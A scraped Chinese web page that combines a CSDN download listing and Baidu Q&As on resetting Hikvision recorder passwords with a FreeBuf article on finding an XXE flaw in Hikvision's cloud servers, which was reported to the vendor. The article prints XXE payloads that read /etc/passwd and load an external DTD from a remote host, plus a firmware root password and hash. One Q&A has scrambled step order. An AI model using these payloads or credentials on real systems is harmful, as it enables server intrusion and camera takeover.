&>&海康威视密码破解
海康威视密码破解
上传大小：388B
恢复密码步骤：
1、将硬盘录像机用一根网线和一台电脑连接起来
2、去海康威视官方网站下载一个叫SADP的软件进行安装，该软件叫设备自动搜索软件
3、通过该软件搜到自己的硬盘录像机，找到硬盘序列号，并用笔记录下来
4、打海康分公司电话或者发邮件到,等待对方回复一个“恢复设备的缺省密码”
5、将得到的“恢复设备缺省密码”填入软件右下方，点确定，密码即可恢复为出厂12345。
综合评分：0
10积分/C币
下载个数：
{%username%}回复{%com_username%}{%time%}\
/*点击出现回复框*/
$(".respond_btn").on("click", function (e) {
$(this).parents(".rightLi").children(".respond_box").show();
e.stopPropagation();
$(".cancel_res").on("click", function (e) {
$(this).parents(".res_b").siblings(".res_area").val("");
$(this).parents(".respond_box").hide();
e.stopPropagation();
/*删除评论*/
$(".del_comment_c").on("click", function (e) {
var id = $(e.target).attr("id");
$.getJSON('/index.php/comment/do_invalid/' + id,
function (data) {
if (data.succ == 1) {
$(e.target).parents(".conLi").remove();
alert(data.msg);
$(".res_btn").click(function (e) {
var parentWrap = $(this).parents(".respond_box"),
q = parentWrap.find(".form1").serializeArray(),
resStr = $.trim(parentWrap.find(".res_area_r").val());
console.log(q);
//var res_area_r = $.trim($(".res_area_r").val());
if (resStr == '') {
$(".res_text").css({color: "red"});
$.post("/index.php/comment/do_comment_reply/", q,
function (data) {
if (data.succ == 1) {
var $target,
evt = e || window.
$target = $(evt.target || evt.srcElement);
var $dd = $target.parents('dd');
var $wrapReply = $dd.find('.respond_box');
console.log($wrapReply);
//var mess = $(".res_area_r").val();
var mess = resS
var str = str.replace(/{%header%}/g, data.header)
.replace(/{%href%}/g, 'http://' + window.location.host + '/user/' + data.username)
.replace(/{%username%}/g, data.username)
.replace(/{%com_username%}/g, data.com_username)
.replace(/{%time%}/g, data.time)
.replace(/{%id%}/g, data.id)
.replace(/{%mess%}/g, mess);
$dd.after(str);
$(".respond_box").hide();
$(".res_area_r").val("");
$(".res_area").val("");
$wrapReply.hide();
alert(data.msg);
}, "json");
/*删除回复*/
$(".rightLi").on("click", '.del_comment_r', function (e) {
var id = $(e.target).attr("id");
$.getJSON('/index.php/comment/do_comment_del/' + id,
function (data) {
if (data.succ == 1) {
$(e.target).parent().parent().parent().parent().parent().remove();
$(e.target).parents('.res_list').remove()
alert(data.msg);
//填充回复
function KeyP(v) {
var parentWrap = $(v).parents(".respond_box");
parentWrap.find(".res_area_r").val($.trim(parentWrap.find(".res_area").val()));
评论共有0条
综合评分：
积分/C币：3
综合评分：
积分/C币：11
综合评分：
积分/C币：13
综合评分：
积分/C币：3
综合评分：
积分/C币：5
综合评分：
积分/C币：11
综合评分：
积分/C币：3
VIP会员动态
CSDN下载频道资源及相关规则调整公告V11.10
下载频道用户反馈专区
下载频道积分规则调整V1710.18
spring mvc+mybatis+mysql+maven+bootstrap 整合实现增删查改简单实例.zip
资源所需积分/C币
当前拥有积分
当前拥有C币
输入下载码
为了良好体验，不建议使用迅雷下载
海康威视密码破解
会员到期时间：
剩余下载个数：
剩余积分：0
为了良好体验，不建议使用迅雷下载
积分不足！
资源所需积分/C币
当前拥有积分
您可以选择
程序员的必选
绿色安全资源
资源所需积分/C币
当前拥有积分
当前拥有C币
为了良好体验，不建议使用迅雷下载
资源所需积分/C币
当前拥有积分
当前拥有C币
为了良好体验，不建议使用迅雷下载
资源所需积分/C币
当前拥有积分
当前拥有C币
您的积分不足，将扣除 10 C币
为了良好体验，不建议使用迅雷下载
无法举报自己的资源
你当前的下载分为234。
你还不是VIP会员
开通VIP会员权限，免积分下载
你下载资源过于频繁，请输入验证码
您因违反CSDN下载频道规则而被锁定帐户，如有疑问，请联络:!
若举报审核通过，可返还被扣除的积分
被举报人：
举报的资源分：
请选择类型
资源无法下载 （ 404页面、下载失败、资源本身问题）
资源无法使用 （文件损坏、内容缺失、题文不符）
侵犯版权资源 （侵犯公司或个人版权）
虚假资源 （恶意欺诈、刷分资源）
含色情、危害国家安全内容
含广告、木马病毒资源
*详细原因：
海康威视密码破解2029人阅读
物联网发展和安全威胁总是如影随形。两个月前，我想研究一下网络摄像机，然后就在亚马逊上购买了一个比较便宜的，由海康威视代工生产的。当我在破解Elisa摄像机尝试获取密码信息的过程中，却偶然发现了海康威视远程系统的一个XML外部实体注入漏洞（XXE）。
XXE Injection即XMLExternal Entity Injection,也就是XML外部实体注入攻击，漏洞是在对非安全的外部实体数据进?行处理时引发的安全问题。在XML1.0标准里,XML文档结构?定义了实体(entity)这个概念。实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容。如果在这个过程中引入了”恶意”源,在对XML文档处理后则可能导致信息泄漏等安全问题。具体可参考。
1 研究开始
通常来说，大多网络摄像机数据要被上传到其后台系统中，也就是说，只有利用网页或者app通过其云服务平台才能访问摄像机。我通过摄像机以太网接口把其连接到实验室环境，进行网络流量监听。因为一些设备内置了老旧或不安全的固件，所以如果想做物联网设备相关的实验，强烈建议不要急于把设备接上互联网。
从Wireshark抓包流量中发现了几个有意思的数据包：
（1）两个未加密的请求调用：
（2）向网站发起POST请求的base64加密数据包（后作分析）
（3）从Amazon S3存储中的Get请求：
2 尝试破解网络摄像机
利用Nmap扫描摄像机，发现了一些开放端口服务，其中包括一个登录页面，经尝试，一些海康威视常用的默认用户名和密码组合无法正确登录。后来发现，密码验证的控制器受http摘要认证机制保护，这是该固件独有的特点。利用binwalk和对固件进行分析后，虽然没发现任何摘要认证信息，却提取到了一些有意思的东西，如/etc/passwd文件和其中的root密码hiklinux：
root:ToCOv8qxP13qs:0:0:root:/root/:/bin/sh
对固件进行升级之后，摄像机的SSH端口就变为关闭状态了，所以我没法利用这个点，只能尝试其它途径。
3 发现XXE漏洞
回到向发起请求的数据包，它是一个Base64编码的POST字符串，解码之后是一堆乱码，当然，摄像机用来验证服务器的密码可能就在固件中，只是需要时间去分析发现。然而，我从上无意发现了这个：
如果发现任何漏洞，请联系，请勿对外公开漏洞细节。
这是一个漏洞悬赏项目，好吧，让我们来研究研究它的POST请求。由于这是一个XML
POST请求，我首先尝试用SYSTEM entity方法来让远程网站引用本地实体文件，如:
&?xml version=”1.0”?&&!DOCTYPE netspi [&!ENTITY a SYSTEM“file:///etc/passwd” &]&&&b;&
但该方法并不奏效，于是，我利用VPS远程传入引用实体，成功了！
&?xml version=”1.0”?&&!DOCTYPE netspi [&!ENTITY a SYSTEM“http://www.xxx.com/test.dtd” &]&&&b;&
图：载入外部实体成功
！这就有意思了，既然我们可以使用SYSTEM entity方式加载引用外部实体，就可以通过恶意dtd文件调用回传其它网站文件，如/etc/hosts文件等。所有这些过程都可以通过一个好用的自动化工具来完成：
OK，我可以远程读取网站上的任意文件，包括etc/shadow文件，当然也就获取了这台服务器的root权限。而且，海康威视分布在全球的其它API服务器同样存在该XXE漏洞，最终，如果获得了这些远程服务器权限，甚至连大量网络摄像机都面临安全风险。
漏洞报告提交流程：
2016年8月6日，发送第一封邮件到海康威视安全响应中心（HSRC）
2016年8月16日，HSRC无回应，之后我又发送了一封邮件
2016年9月6日，重新给海康威视市场和公关部门发了一封邮件
2016年9月7日，HSRC确认接收并要求发送更多信息
2016年9月8日，海康威视修复了漏洞并要求我重新测试
2016年9月25日，作为奖励，收到了海康威视一个价值69美元的网络摄像机，(╯°□°）╯︵
**参考来源：
，FB小编clouds编译，转载请注明来自FreeBuf（FreeBuf.COM）如何破解海康威视萤石云监控密码_百度知道
如何破解海康威视萤石云监控密码
我有更好的答案
这个可以让其它的手机也在萤石云官网上注册用户,注册上自己手机号. 这样在你的萤石云配置中有好友管理,添加上他的手机号,分给他可以看哪个通道的权限,他在自己手机上登陆自己的帐号就可以看到你分配给他的视频的. 可以添加多个好友,把视频分配
采纳率：93%
来自团队：
为您推荐：
其他类似问题
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。海康威视硬盘录像机怎么破解密码？_百度知道
海康威视硬盘录像机怎么破解密码？
我有更好的答案
等待对方回复一个“恢复设备的缺省密码”5、将得到的“恢复设备缺省密码”填入软件右下方，点确定，密码即可恢复为出厂12345、去海康威视官方网站下载一个叫SADP的软件进行安装，找到硬盘序列号.com，并用笔记录下来4、打海康分公司电话或者发邮件到4005@hikvision：1、通过该软件搜到自己的硬盘录像机，该软件叫设备自动搜索软件下载地址：http://www.hikvision.com/cn/download_more_393、将硬盘录像机用一根网线和一台电脑连接起来2恢复密码步骤
采纳率：71%
为您推荐：
其他类似问题
硬盘录像机的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。